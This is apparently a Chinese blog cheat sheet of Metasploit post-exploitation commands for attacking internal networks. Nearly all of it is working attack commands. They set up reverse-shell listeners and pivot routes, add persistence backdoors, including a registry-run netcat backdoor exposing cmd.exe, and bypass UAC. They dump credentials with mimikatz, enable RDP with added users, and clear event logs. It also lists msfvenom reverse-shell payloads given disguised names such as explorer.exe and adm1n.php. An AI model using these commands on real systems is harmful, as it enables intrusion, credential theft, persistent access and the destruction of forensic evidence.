MSF之常用TIPS

  • A+

msf做内网常用而又容易忘记的命令等,分享下:

反弹Shell监听

例如bash、powershell反弹shell接收。

use exploit/multi/handler
set PAYLOAD generic/shell_reverse_tcp
set LHOST 0.0.0.0
set LPORT 52113
set ExitOnSession false
exploit -j

shell解决中文乱码

windows拿过来的shell因编码问题中文乱码可解决。

chcp 65001

Shell变Meterpreter

从shell获取meterperter方便后渗透模块利用。

use post/multi/manage/shell_to_meterpreter
set LHOST x.x.x.x
set LPORT 52114
set SESSION 1
set HANDLER true
run -j

CS变MSF

从cs派生到msf上。

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost x.x.x.x
set lport 52111
run -j

CS设置foreign reverse_tcp并spawn

MSF变CS

CS设置beacon reverse_http

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost x.x.x.x
set lport 52111
set DisablePayloadHandler true
set session 1
run

添加路由

内网转发必添路由,要么meterpreter中autoroute,要么全局route add

autoroute模块

run autoroute -s 192.168.1.0/24
run autoroute -p

本机增加route

route add 网段 掩码 sessionid号
route print

添加socks代理

添加路由后只是msf所在的vps可访问内网了,本机如进入内网还需msf开socks代理,msf支持socks4a和socks5

use auxiliary/server/socks5
set srvhost 0.0.0.0
set srvport 1080
run

进行端口转发

将远程的3389转移到本地的6666

portfwd add -l 6666 -p 3389 -r 127.0.0.1

持久后门persistence

run persistence -U -i 10 -p 443 -r x.x.x.x

-A 自动启动一个匹配的exploit / multi / handler来连接到代理
-L 如果未使用%TEMP%,则在目标主机中写入有效负载的位置
-P 有效负载使用,默认为windows / meterpreter / reverse_tcp
-S 作为服务自动启动代理程序(具有SYSTEM权限)
-T 要使用的备用可执行模板
-U 用户登录时自动启动
-X 系统引导时自动启动
-h 这个帮助菜单
-i 每次连接尝试之间的时间间隔(秒)
-p 运行Metasploit的系统正在侦听的端口
-r 运行Metasploit监听连接的系统的IP

服务型后门metsvc

生成meter服务后门,metsvc_bind_tcp模块连接

run metsvc

注册表nc后门

设置注册表nc

reg setval -k HKLMsoftwaremicrosoftwindowscurrentversionrun -v rdpservice -d 'C:windowssystem32nc.exe -Ldp 443 -e cmd.exe'

查看是否设置成功

reg queryval -k HKLMsoftwaremicrosoftwindowscurrentversionRun -v rpdservice

uac绕过

use exploit/windows/local/ask
set session 1

无文件执行程序

execute -H -i -f cmd.exe

execute -H -m -d notepad.exe -f wce.exe -a "-o wce.txt"

-H 隐藏运行界面
-m 直接从内存中执行
-d 在目标主机执行时显示的进程名称
-f 要执行的程序
-a 指定执行程序的参数,如 "-o wce.txt"

进程绑定

获取meterpreter的进程号:

getpid

绑定到其他进程上:

migrate + 其他pid

mimikatz命令

加载模块

load mimikatz

获取hash密码

msv

获取明文密码

kerberos

ssp

wdigest

或者使用mimikatz_command命令

mimikatz_command -f hash::

mimikatz_command -f samdump::hashes

mimikatz_command -f sekurlsa::searchPasswords

远程连接

enable_rdp模块

开启远程桌面

run post/windows/manage/enable_rdp

添加用户

run post/windows/manage/enable_rdp USERNAME=www2 PASSWORD=123456

转发3389到6662

run post/windows/manage/enable_rdp FORWARD=true LPORT=6662

getgui模块

开启远程桌面

run getgui -e

添加远程桌面用户

run getgui -u example_username -p example_password

转发3389到6662

run getgui -f 6662 –e

vnc模块

开启vnc连接

run vnc

msfvenom常用

最讨厌的命令组合,又长又不能自动补全,,zsh曾经有个插件可自动补全msfvenom命令,但换了新版zsh后从未成功过,,

普通生成

msfvenom -p -f -o

编码处理

msfvenom -p -e -i -n -f -o

exe

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=52114 -e shikata_ga_nai -b 'x00x0axff' -i 3 -f exe -o explorer.exe

elf

msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=52114 -f elf -o bashs.elf

powershell

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=x.x.x.x LPORT=52114 -e cmd/powershell_base64 -i 3 -f psh-reflection -o powershell.ps1

msfvenom -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=52114 -f psh-reflection -o powershell.ps1

php

msfvenom -p php/meterpreter_reverse_tcp LHOST=x.x.x.x LPORT=52114 -o adm1n.php

aspx

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=52114 -f aspx -o defa1ut.aspx

jsp

msfvenom --platform java -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=52114 -f jsp -o adm1n.jsp

war

msfvenom -p java/jsp_shell_reverse_tcp LHOST=x.x.x.x LPORT=52114 -f war -o adm1n.war

win c

msfvenom -a x86 --platform Windows -p windows/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=52114 -f c -o winc64.c

lin c

msfvenom -a x64 --platform Linux -p linux/x64/meterpreter/reverse_tcp LHOST=x.x.x.x LPORT=52114 -f c -o linc64.c

shellcode

msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.x.x lport=52114 -e shikata_ga_nai -i 5 -f raw > code.c

其他

win是否为虚拟机

run post/windows/gather/checkvm

lin是否为虚拟机

run post/linux/gather/checkvm

查找域控

run post/windows/gather/enum_domain

获取常见信息

run scraper

arp存活扫描

run post/windows/gather/arp_scanner RHOSTS=192.168.159.0/24

端口扫描

run auxiliary/scanner/portscan/tcp RHOSTS=192.168.159.144 PORTS=3389

清除日志

clearev

相关推荐: 使用网址计划窃取Bear Notes

译文声明 本文是翻译文章,文章原作者Wojciech Reguła 文章来源:https://wojciechregula.blog 原文地址:https://wojciechregula.blog/post/stealing-bear-notes-with-…